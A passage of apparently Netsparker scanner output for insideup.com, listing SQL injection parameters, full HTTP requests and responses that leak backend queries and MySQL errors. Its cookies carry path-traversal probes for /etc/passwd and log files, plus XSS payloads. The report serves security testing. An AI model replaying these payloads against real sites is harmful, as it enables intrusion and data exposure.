convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/phsy00/project.php?catId=110009&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'' OR prj.project_page_url = 'leadflow/phsy00/project.php?catId=110009&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'/'You have an error in your SQL syntax; check the manual that corresponds to your 
MySQL server version for the right syntax to use near 'int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+' at line 5
- /ppc/leadflow/meac00/project.php

/ppc/leadflow/meac00/project.php

http://www.insideup.com/ppc/leadflow/meac00/project.php?catId=30008&iusrc='%2B%20(select+convert(int..

Parameters

Parameter Type Value
catId GET 30008
iusrc GET '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'

Request

GET /ppc/leadflow/meac00/project.php?catId=30008&iusrc='%2B%20(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns)%20%2B' HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:25:02 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=9e8rb3lfiffscj6mnsdocqt0j3; path=/
Content-Length: 4143
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/meac00/project.php?catId=30008&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'' OR prj.project_page_url = 'leadflow/meac00/project.php?catId=30008&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/meac00/project.php?catId=30008&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'' OR prj.project_page_url = 'leadflow/meac00/project.php?catId=30008&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/meac00/project.php?catId=30008&iusrc='+ (select 
convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'' OR prj.project_page_url = 'leadflow/meac00/project.php?catId=30008&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/meac00/project.php?catId=30008&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'' OR prj.project_page_url = 'leadflow/meac00/project.php?catId=30008&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/meac00/project.php?catId=30008&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'' OR prj.project_page_url = 'leadflow/meac00/project.php?catId=30008&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL 
server version for the right syntax to use near 'int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+' at line 5
- /ppc/leadflow/inco00/project.php

/ppc/leadflow/inco00/project.php

http://www.insideup.com/ppc/leadflow/inco00/project.php?catId=60003&iusrc='%2B%20(select+convert(int..

Parameters

Parameter Type Value
catId GET 60003
iusrc GET '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'

Request

GET /ppc/leadflow/inco00/project.php?catId=60003&iusrc='%2B%20(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns)%20%2B' HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:25:10 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=1g5egb3nr1ejfbahhjdb5kap66; path=/
Content-Length: 4143
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/inco00/project.php?catId=60003&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'' OR prj.project_page_url = 'leadflow/inco00/project.php?catId=60003&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/inco00/project.php?catId=60003&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'' OR prj.project_page_url = 'leadflow/inco00/project.php?catId=60003&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/inco00/project.php?catId=60003&iusrc='+ (select 
convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'' OR prj.project_page_url = 'leadflow/inco00/project.php?catId=60003&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/inco00/project.php?catId=60003&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'' OR prj.project_page_url = 'leadflow/inco00/project.php?catId=60003&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/inco00/project.php?catId=60003&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'' OR prj.project_page_url = 'leadflow/inco00/project.php?catId=60003&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL 
server version for the right syntax to use near 'int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+' at line 5
- /ppc/leadflow/bulo00/project.php

/ppc/leadflow/bulo00/project.php

http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId='%2B%20(select+convert(int,CHAR(95)%2B..

Parameters

Parameter Type Value
catId GET '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
iusrc GET iupsc

Request

GET /ppc/leadflow/bulo00/project.php?catId='%2B%20(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns)%20%2B'&iusrc=iupsc HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 